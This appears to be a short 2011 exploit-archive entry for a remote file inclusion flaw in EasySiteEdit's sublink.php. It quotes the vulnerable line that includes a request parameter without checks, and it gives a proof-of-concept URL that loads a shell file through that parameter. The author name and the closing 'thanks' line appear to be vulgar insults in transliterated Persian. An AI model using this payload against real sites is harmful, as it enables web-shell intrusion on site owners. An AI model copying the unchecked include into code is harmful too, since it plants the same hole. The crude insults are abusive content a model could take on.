EasySiteEdit Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EasySiteEdit Remote File Inclusion Vulnerability
# Published : 2011-08-21
# Author :
# Previous Title : WordPress ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
# Next Title : Sun/Oracle GlassFish Server Authenticated Code Execution

# Exploit Title: EasySiteEdit remote file include
# Date:2011 
# Author:koskesh jakesh
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip 
# Tested on: linux
-------------------------------
vul:sublink.php
line 20: 
include($_REQUEST['langval']);
-------------------------------
poc:
site.com/path/sublink.php?langval=shell.txt?
--------------------------------
thanks:kire rostam,kose zan dait,kose shohar amat